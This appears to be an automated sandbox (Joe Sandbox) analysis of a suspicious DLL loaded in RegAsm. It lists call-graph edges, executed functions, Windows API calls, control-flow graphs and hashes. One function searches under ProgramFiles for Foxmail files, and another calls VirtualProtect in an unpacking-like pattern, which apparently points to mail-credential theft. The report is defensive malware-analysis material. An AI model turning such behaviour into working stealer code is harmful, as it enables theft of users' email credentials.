6419 10008962 6418->6419 6421 1000890f 6418->6421 6424 10008801 __freea 19 API calls 6419->6424 6420->6422 6438 10005f19 6421->6438 6422->6418 6422->6419 6424->6414 6426 10008971 6428 100056d0 20 API calls 6426->6428 6432 10008992 6426->6432 6427 10008939 6427->6419 6429 10005f19 10 API calls 6427->6429 6428->6432 6429->6419 6430 10008a07 6431 10008801 __freea 19 API calls 6430->6431 6431->6419 6432->6430 6433 10005f19 10 API calls 6432->6433 6434 100089e6 6433->6434 6434->6430 6435 100089f5 WideCharToMultiByte 6434->6435 6435->6430 6436 10008a35 6435->6436 6437 10008801 __freea 19 API calls 6436->6437 6437->6419 6439 10005c45 _abort 4 API calls 6438->6439 6440 10005f40 6439->6440 6443 10005f49 6440->6443 6446 10005fa1 6440->6446 6444 10002ada _ValidateLocalCookies 5 API calls 6443->6444 6445 10005f9b 6444->6445 6445->6419 6445->6426 6445->6427 6447 10005c45 _abort 4 API calls 6446->6447 6448 10005fc8 6447->6448 6449 10002ada _ValidateLocalCookies 5 API calls 6448->6449 6450 10005f89 LCMapStringW 6449->6450 6450->6443 6452 10006892 ___DestructExceptionObject 6451->6452 6459 10005671 RtlEnterCriticalSection 6452->6459 6454 1000689c 6460 100068f1 6454->6460 6458 100068b5 _abort 6458->5934 6459->6454 6472 10007011 6460->6472 6462 1000693f 6463 10007011 25 API calls 6462->6463 6464 1000695b 6463->6464 6465 10007011 25 API calls 6464->6465 6466 10006979 6465->6466 6467 100068a9 6466->6467 6468 1000571e _free 19 API calls 6466->6468 6469 100068bd 6467->6469 6468->6467 6486 100056b9 RtlLeaveCriticalSection 6469->6486 6471 100068c7 6471->6458 6473 10007022 6472->6473 6481 1000701e 6472->6481 6474 10007029 6473->6474 6478 1000703c ___scrt_fastfail 6473->6478 6475 10006368 _free 19 API calls 6474->6475 6476 1000702e 6475->6476 6477 100062ac _abort 25 API calls 6476->6477 6477->6481 6479 10007073 6478->6479 6480 1000706a 6478->6480 6478->6481 6479->6481 6483 10006368 _free 19 API calls 6479->6483 6482 10006368 _free 19 API calls 6480->6482 6481->6462 6484 1000706f 6482->6484 6483->6484 6485 100062ac _abort 25 API calls 6484->6485 6485->6481 6486->6471 7516 10007260 GetStartupInfoW 7517 10007286 7516->7517 7518 10007318 7516->7518 7517->7518 7522 10008be3 7517->7522 7520 100072af 7520->7518 7521 100072dd GetFileType 7520->7521 7521->7520 7523 10008bef ___DestructExceptionObject 7522->7523 7524 10008c13 7523->7524 7525 10008bfc 7523->7525 7535 10005671 RtlEnterCriticalSection 7524->7535 7527 10006368 _free 19 API calls 7525->7527 7528 10008c01 7527->7528 7529 100062ac _abort 25 API calls 7528->7529 7530 10008c0b _abort 7529->7530 7530->7520 7531 10008c4b 7543 10008c72 7531->7543 7534 10008c1f 7534->7531 7536 10008b34 7534->7536 7535->7534 7537 1000637b _abort 19 API calls 7536->7537 7538 10008b46 7537->7538 7540 10005eb7 10 API calls 7538->7540 7542 10008b53 7538->7542 7539 1000571e _free 19 API calls 7541 10008ba5 7539->7541 7540->7538 7541->7534 7542->7539 7546 100056b9 RtlLeaveCriticalSection 7543->7546 7545 10008c79 7545->7530 7546->7545 7654 100081a0 7655 100081d9 7654->7655 7656 100081dd 7655->7656 7667 10008205 7655->7667 7657 10006368 _free 19 API calls 7656->7657 7658 100081e2 7657->7658 7660 100062ac _abort 25 API calls 7658->7660 7659 10008529 7661 10002ada _ValidateLocalCookies 5 API calls 7659->7661 7662 100081ed 7660->7662 7663 10008536 7661->7663 7664 10002ada _ValidateLocalCookies 5 API calls 7662->7664 7666 100081f9 7664->7666 7667->7659 7668 100080c0 7667->7668 7671 100080db 7668->7671 7669 10002ada _ValidateLocalCookies 5 API calls 7670 10008152 7669->7670 7670->7667 7671->7669 7855 1000a1e0 7858 1000a1fe 7855->7858 7857 1000a1f6 7859 1000a203 7858->7859 7860 1000aa53 20 API calls 7859->7860 7862 1000a298 7859->7862 7861 1000a42f 7860->7861 7861->7857 7862->7857 7547 10009d61 7548 10009d81 7547->7548 7551 10009db8 7548->7551 7550 10009dab 7552 10009dbf 7551->7552 7553 10009e20 7552->7553 7554 10009ddf 7552->7554 7555 1000aa17 20 API calls 7553->7555 7556 1000a90e 7553->7556 7554->7556 7558 1000aa17 20 API calls 7554->7558 7557 10009e6e 7555->7557 7556->7550 7557->7550 7559 1000a93e 7558->7559 7559->7550 7672 100021a1 ___scrt_dllmain_exception_filter 6487 1000c7a7 6488 1000c7be 6487->6488 6493 1000c82c 6487->6493 6488->6493 6497 1000c7e6 GetModuleHandleA 6488->6497 6489 1000c872 6490 1000c835 GetModuleHandleA 6492 1000c83f 6490->6492 6492->6492 6492->6493 6493->6489 6493->6490 6494 1000c7dd 6494->6493 6495 1000c80d VirtualProtect 6494->6495 6495->6493 6496 1000c81c VirtualProtect 6495->6496 6496->6493 6498 1000c7ef 6497->6498 6504 1000c82c 6497->6504 6507 1000c803 6498->6507 6500 1000c872 6501 1000c835 GetModuleHandleA 6502 1000c83f 6501->6502 6502->6502 6502->6504 6503 1000c7f4 6503->6504 6505 1000c80d VirtualProtect 6503->6505 6504->6500 6504->6501 6505->6504 6506 1000c81c VirtualProtect 6505->6506 6506->6504 6508 1000c809 6507->6508 6509 1000c82c 6508->6509 6510 1000c80d VirtualProtect 6508->6510 6512 1000c872 6509->6512 6513 1000c835 GetModuleHandleA 6509->6513 6510->6509 6511 1000c81c VirtualProtect 6510->6511 6511->6509 6514 1000c83f 6513->6514 6514->6509 7019 1000742b 7020 10007430 7019->7020 7022 10007453 7020->7022 7023 10008bae 7020->7023 7024 10008bdd 7023->7024 7025 10008bbb 7023->7025 7024->7020 7026 10008bd7 7025->7026 7027 10008bc9 RtlDeleteCriticalSection 7025->7027 7028 1000571e _free 19 API calls 7026->7028 7027->7026 7027->7027 7028->7024 7560 1000ac6b 7561 1000ac84 __startOneArgErrorHandling 7560->7561 7563 1000acad __startOneArgErrorHandling 7561->7563 7564 1000b2f0 7561->7564 7565 1000b329 __startOneArgErrorHandling 7564->7565 7566 1000b5c1 __raise_exc RaiseException 7565->7566 7567 1000b350 __startOneArgErrorHandling 7565->7567 7566->7567 7568 1000b393 7567->7568 7569 1000b36e 7567->7569 7570 1000b8b2 __startOneArgErrorHandling 19 API calls 7568->7570 7575 1000b8e1 7569->7575 7572 1000b38e __startOneArgErrorHandling 7570->7572 7573 10002ada _ValidateLocalCookies 5 API calls 7572->7573 7574 1000b3b7 7573->7574 7574->7563 7576 1000b8f0 7575->7576 7577 1000b964 __startOneArgErrorHandling 7576->7577 7578 1000b90f __startOneArgErrorHandling 7576->7578 7580 1000b8b2 __startOneArgErrorHandling 19 API calls 7577->7580 7579 100078a3 __startOneArgErrorHandling 5 API calls 7578->7579 7581 1000b950 7579->7581 7583 1000b95d 7580->7583 7582 1000b8b2 __startOneArgErrorHandling 19 API calls 7581->7582 7581->7583 7582->7583 7583->7572 7673 100060ac 7674 100060dd 7673->7674 7676 100060b7 7673->7676 7675 100060c7 FreeLibrary 7675->7676 7676->7674 7676->7675 7584 1000506f 7585 10005081 7584->7585 7586 10005087 7584->7586 7587 10005000 19 API calls 7585->7587 7587->7586 7029 10005630 7030 1000563b 7029->7030 7032 10005664 7030->7032 7033 10005660 7030->7033 7035 10005eb7 7030->7035 7042 10005688 7032->7042 7036 10005c45 _abort 4 API calls 7035->7036 7037 10005ede 7036->7037 7038 10005efc InitializeCriticalSectionAndSpinCount 7037->7038 7039 10005ee7 7037->7039 7038->7039 7040 10002ada _ValidateLocalCookies 5 API calls 7039->7040 7041 10005f13 7040->7041 7041->7030 7043 100056b4 7042->7043 7044 10005695 7042->7044 7043->7033 7045 1000569f RtlDeleteCriticalSection 7044->7045 7045->7043 7045->7045 7588 10003370 7599 10003330 7588->7599 7600 10003342 7599->7600 7601 1000334f 7599->7601 7602 10002ada _ValidateLocalCookies 5 API calls 7600->7602 7602->7601 7863 100063f0 7864 10006400 7863->7864 7872 10006416 7863->7872 7865 10006368 _free 19 API calls 7864->7865 7866 10006405 7865->7866 7867 100062ac _abort 25 API calls 7866->7867 7869 1000640f 7867->7869 7868 10004e76 19 API calls 7873 100064e5 7868->7873 7871 100064ee 7874 1000571e _free 19 API calls 7871->7874 7875 10006561 7872->7875 7876 10006480 7872->7876 7882 10006580 7872->7882 7873->7871 7879 10006573 7873->7879 7893 100085eb 7873->7893 7874->7875 7902 1000679a 7875->7902 7876->7868 7880 100062bc _abort 11 API calls 7879->7880 7881 1000657f 7880->7881 7883 1000658c 7882->7883 7883->7883 7884 1000637b _abort 19 API calls 7883->7884 7885 100065ba 7884->7885 7886 100085eb 25 API calls 7885->7886 7887 100065e6 7886->7887 7888 100062bc _abort 11 API calls 7887->7888 7889 10006615 ___scrt_fastfail 7888->7889 7890 100066b6 FindFirstFileExA 7889->7890 7891 10006705 7890->7891 7892 10006580 25 API calls 7891->7892 7894 1000853a 7893->7894 7896 10008554 7894->7896 7897 1000854f 7894->7897 7899 1000858b 7894->7899 7895 10006368 _free 19 API calls 7901 1000857a 7895->7901 7896->7873 7897->7895 7897->7896 7898 100062ac _abort 25 API calls 7898->7896 7899->7896 7900 10006368 _free 19 API calls 7899->7900 7900->7901 7901->7898 7907 100067a4 7902->7907 7903 100067b4 7904 1000571e _free 19 API calls 7903->7904 7906 100067bb 7904->7906 7905 1000571e _free 19 API calls 7905->7907 7906->7869 7907->7903 7907->7905 7603 10009e71 7604 10009e95 7603->7604 7605 10009ee6 7604->7605 7608 10009f71 __startOneArgErrorHandling 7604->7608 7607 10009ef8 7605->7607 7611 1000aa53 7605->7611 7609 1000b2f0 20 API calls 7608->7609 7610 1000acad __startOneArgErrorHandling 7608->7610 7609->7610 7612 1000aa70 RtlDecodePointer 7611->7612 7613 1000aa80 7611->7613 7612->7613 7614 1000ab0d 7613->7614 7617 1000ab02 7613->7617 7619 1000aab7 7613->7619 7614->7617 7618 10006368 _free 19 API calls 7614->7618 7615 10002ada _ValidateLocalCookies 5 API calls 7616 1000ac67 7615->7616 7616->7607 7617->7615 7618->7617 7619->7617 7620 10006368 _free 19 API calls 7619->7620 7620->7617 7681 10003eb3 7682 10005411 36 API calls 7681->7682 7683 10003ebb 7682->7683 7046 1000543d 7047 10005440 7046->7047 7048 100055a8 _abort 36 API calls 7047->7048 7049 1000544c 7048->7049 6817 10001f3f 6818 10001f4b ___DestructExceptionObject 6817->6818 6835 1000247c 6818->6835 6820 10001f52 6821 10002041 6820->6821 6822 10001f7c 6820->6822 6829 10001f57 ___scrt_is_nonwritable_in_current_image 6820->6829 6858 10002639 IsProcessorFeaturePresent 6821->6858 6846 100023de 6822->6846 6825 10002048 6826 10001f8b __RTC_Initialize 6826->6829 6849 100022fc RtlInitializeSListHead 6826->6849 6828 10001f99 ___scrt_initialize_default_local_stdio_options 6850 100046c5 6828->6850 6833 10001fb8 6833->6829 6834 10004669 _abort 5 API calls 6833->6834 6834->6829 6836 10002485 6835->6836 6862 10002933 IsProcessorFeaturePresent 6836->6862 6840 10002496 6841 1000249a 6840->6841 6873 100053c8 6840->6873 6841->6820 6844 100024b1 6844->6820 6929 100024b5 6846->6929 6848 100023e5 6848->6826 6849->6828 6852 100046dc 6850->6852 6851 10002ada _ValidateLocalCookies 5 API calls 6853 10001fad 6851->6853 6852->6851 6853->6829 6854 100023b3 6853->6854 6855 100023b8 ___scrt_release_startup_lock 6854->6855 6856 10002933 ___isa_available_init IsProcessorFeaturePresent 6855->6856 6857 100023c1 6855->6857 6856->6857 6857->6833 6859 1000264e ___scrt_fastfail 6858->6859 6860 100026f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6859->6860 6861 10002744 ___scrt_fastfail 6860->6861 6861->6825 6863 10002491 6862->6863 6864 100034ea 6863->6864 6865 100034ef ___vcrt_initialize_winapi_thunks 6864->6865 6884 10003936 6865->6884 6868 100034fd 6868->6840 6870 10003505 6871 10003510 6870->6871 6898 10003972 6870->6898 6871->6840 6921 10007457 6873->6921 6876 10003529 6877 10003532 6876->6877 6878 10003543 6876->6878 6879 1000391b ___vcrt_uninitialize_ptd 5 API calls 6877->6879 6878->6841 6880 10003537 6879->6880 6881 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6880->6881 6882 1000353c 6881->6882 6925 10003c50 6882->6925 6886 1000393f 6884->6886 6887 10003968 6886->6887 6888 100034f9 6886->6888 6902 10003be0 6886->6902 6889 10003972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6887->6889 6888->6868 6890 100038e8 6888->6890 6889->6888 6907 10003af1 6890->6907 6893 100038fd 6893->6870 6894 10003ba2 ___vcrt_FlsSetValue 5 API calls 6895 1000390b 6894->6895 6896 10003918 6895->6896 6912 1000391b 6895->6912 6896->6870 6899 1000399c 6898->6899 6900 1000397d 6898->6900 6899->6868 6901 10003987 RtlDeleteCriticalSection 6900->6901 6901->6899 6901->6901 6903 10003a82 try_get_function 4 API calls 6902->6903 6904 10003bfa 6903->6904 6905 10003c18 InitializeCriticalSectionAndSpinCount 6904->6905 6906 10003c03 6904->6906 6905->6906 6906->6886 6908 10003a82 try_get_function 4 API calls 6907->6908 6909 10003b0b 6908->6909 6910 10003b24 TlsAlloc 6909->6910 6911 100038f2 6909->6911 6911->6893 6911->6894 6913 1000392b 6912->6913 6914 10003925 6912->6914 6913->6893 6916 10003b2c 6914->6916 6917 10003a82 try_get_function 4 API calls 6916->6917 6918 10003b46 6917->6918 6919 10003b5e TlsFree 6918->6919 6920 10003b52 6918->6920 6919->6920 6920->6913 6924 10007470 6921->6924 6922 10002ada _ValidateLocalCookies 5 API calls 6923 100024a3 6922->6923 6923->6844 6923->6876 6924->6922 6926 10003c7f 6925->6926 6927 10003c59 6925->6927 6926->6878 6927->6926 6928 10003c69 FreeLibrary 6927->6928 6928->6927 6930 100024c4 6929->6930 6931 100024c8 6929->6931 6930->6848 6932 10002639 ___scrt_fastfail 4 API calls 6931->6932 6934 100024d5 ___scrt_release_startup_lock 6931->6934 6933 10002559 6932->6933 6934->6848 6935 10005bff 6943 10005d5c 6935->6943 6938 10005b7a __dosmaperr 19 API calls 6939 10005c1b 6938->6939 6940 10005c28 6939->6940 6950 10005c2b 6939->6950 6942 10005c13 6944 10005c45 _abort 4 API calls 6943->6944 6945 10005d83 6944->6945 6946 10005d9b TlsAlloc 6945->6946 6947 10005d8c 6945->6947 6946->6947 6948 10002ada _ValidateLocalCookies 5 API calls 6947->6948 6949 10005c09 6948->6949 6949->6938 6949->6942 6951 10005c3b 6950->6951 6952 10005c35 6950->6952 6951->6942 6954 10005db2 6952->6954 6955 10005c45 _abort 4 API calls 6954->6955 6956 10005dd9 6955->6956 6957 10005df1 TlsFree 6956->6957 6958 10005de5 6956->6958 6957->6958 6959 10002ada _ValidateLocalCookies 5 API calls 6958->6959 6960 10005e02 6959->6960 6960->6951 7684 100067bf 7689 100067f4 7684->7689 7687 100067db 7688 1000571e _free 19 API calls 7688->7687 7690 100067cd 7689->7690 7691 10006806 7689->7691 7690->7687 7690->7688 7692 10006836 7691->7692 7693 1000680b 7691->7693 7692->7690 7700 100071d6 7692->7700 7694 1000637b _abort 19 API calls 7693->7694 7696 10006814 7694->7696 7698 1000571e _free 19 API calls 7696->7698 7697 10006851 7699 1000571e _free 19 API calls 7697->7699 7698->7690 7699->7690 7701 100071e1 7700->7701 7702 10007209 7701->7702 7703 100071fa 7701->7703 7704 10007218 7702->7704 7709 10008a98 7702->7709 7705 10006368 _free 19 API calls 7703->7705 7716 10008acb 7704->7716 7708 100071ff ___scrt_fastfail 7705->7708 7708->7697 7710 10008aa3 7709->7710 7711 10008ab8 RtlSizeHeap 7709->7711 7712 10006368 _free 19 API calls 7710->7712 7711->7704 7713 10008aa8 7712->7713 7714 100062ac _abort 25 API calls 7713->7714 7715 10008ab3 7714->7715 7715->7704 7717 10008ae3 7716->7717 7718 10008ad8 7716->7718 7719 10008aeb 7717->7719 7727 10008af4 _abort 7717->7727 7720 100056d0 20 API calls 7718->7720 7722 1000571e _free 19 API calls 7719->7722 7721 10008ae0 7720->7721 7721->7708 7722->7721 7723 10008af9 7725 10006368 _free 19 API calls 7723->7725 7724 10008b1e RtlReAllocateHeap 7724->7721 7724->7727 7725->7721 7726 1000474f _abort 7 API calls 7726->7727 7727->7723 7727->7724 7727->7726

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 100010F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1083526818-0
                                                                                                                                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                                                                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                                                                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6
                                                                                                                                                                                Function 100012EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 10001434
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                                                                                                                  • Part of subcall function 100010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                                                                                                                  • Part of subcall function 100010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                                                                                                                  • Part of subcall function 100010F1: FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                                                                                                                  • Part of subcall function 100010F1: FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014C5
                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 100014E0
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 1000150F
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001521
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001547
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001553
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 10001579
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 10001585
                                                                                                                                                                                • lstrlenW.KERNEL32(?,?), ref: 100015AB
                                                                                                                                                                                • lstrcatW.KERNEL32(00000000), ref: 100015B7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                • API String ID: 672098462-2938083778
                                                                                                                                                                                • Opcode ID: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                • Instruction ID: 44b728d421a24f1832cbc0053e0d9d9aefaca4d51113d01ad6b93c48f87fe4b0
                                                                                                                                                                                • Opcode Fuzzy Hash: 70009fe3950369d2bec9de66e6564922956a7fdd4521fcb7cc54e78474496dcb
                                                                                                                                                                                • Instruction Fuzzy Hash: 4081A475A40358A9EB30D7A0DC86FDE7379EF84740F00059AF608EB191EBB16AC5CB95
                                                                                                                                                                                Function 10008821 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 54 10008821-1000883a 55 10008850-10008855 54->55 56 1000883c-1000884c call 10009341 54->56 58 10008862-10008886 MultiByteToWideChar 55->58 59 10008857-1000885f 55->59 56->55 63 1000884e 56->63 61 10008a19-10008a2c call 10002ada 58->61 62 1000888c-10008898 58->62 59->58 64 1000889a-100088ab 62->64 65 100088ec 62->65 63->55 68 100088ca-100088db call 100056d0 64->68 69 100088ad-100088bc call 1000bf20 64->69 67 100088ee-100088f0 65->67 71 100088f6-10008909 MultiByteToWideChar 67->71 72 10008a0e 67->72 68->72 82 100088e1 68->82 69->72 81 100088c2-100088c8 69->81 71->72 75 1000890f-10008921 call 10005f19 71->75 76 10008a10-10008a17 call 10008801 72->76 84 10008926-1000892a 75->84 76->61 83 100088e7-100088ea 81->83 82->83 83->67 84->72 86 10008930-10008937 84->86 87 10008971-1000897d 86->87 88 10008939-1000893e 86->88 90 100089c9 87->90 91 1000897f-10008990 87->91 88->76 89 10008944-10008946 88->89 89->72 94 1000894c-10008966 call 10005f19 89->94 95 100089cb-100089cd 90->95 92 10008992-100089a1 call 1000bf20 91->92 93 100089ab-100089bc call 100056d0 91->93 99 10008a07-10008a0d call 10008801 92->99 106 100089a3-100089a9 92->106 93->99 108 100089be 93->108 94->76 109 1000896c 94->109 95->99 100 100089cf-100089e8 call 10005f19 95->100 99->72 100->99 112 100089ea-100089f1 100->112 111 100089c4-100089c7 106->111 108->111 109->72 111->95 113 100089f3-100089f4 112->113 114 10008a2d-10008a33 112->114 115 100089f5-10008a05 WideCharToMultiByte 113->115 114->115 115->99 116 10008a35-10008a3c call 10008801 115->116 116->76
                                                                                                                                                                                APIs
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                                                                                                                                                • __freea.LIBCMT ref: 10008A08
                                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                                • __freea.LIBCMT ref: 10008A11
                                                                                                                                                                                • __freea.LIBCMT ref: 10008A36
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1414292761-0
                                                                                                                                                                                • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                                                                                                                                                • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                                                                                                                                                • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                                                                                                                                                Function 1000C7E6 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 119 1000c7e6-1000c7ed GetModuleHandleA 120 1000c82d 119->120 121 1000c7ef-1000c7fe call 1000c803 119->121 123 1000c82f-1000c833 120->123 131 1000c800 121->131 132 1000c865 121->132 124 1000c872 call 1000c877 123->124 125 1000c835-1000c83d GetModuleHandleA 123->125 127 1000c83f-1000c847 125->127 127->127 130 1000c849-1000c84c 127->130 130->123 133 1000c84e-1000c850 130->133 134 1000c809-1000c80b 131->134 135 1000c804 call 1000c897 131->135 136 1000c866-1000c86e 132->136 137 1000c852-1000c854 133->137 138 1000c856-1000c85e 133->138 134->120 140 1000c80d-1000c81a VirtualProtect 134->140 135->134 142 1000c870 136->142 141 1000c85f-1000c860 call 1000c897 137->141 138->141 143 1000c82c 140->143 144 1000c81c-1000c82a VirtualProtect 140->144 141->132 142->130 143->120 144->143
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                                                                                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000014.00000002.651082325.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                • Associated: 00000014.00000002.651067630.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000014.00000002.651082325.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_20_2_10000000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: HandleModuleProtectVirtual
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2905821283-0
                                                                                                                                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                                                                                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                                                                                                                                Function 10005CE1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
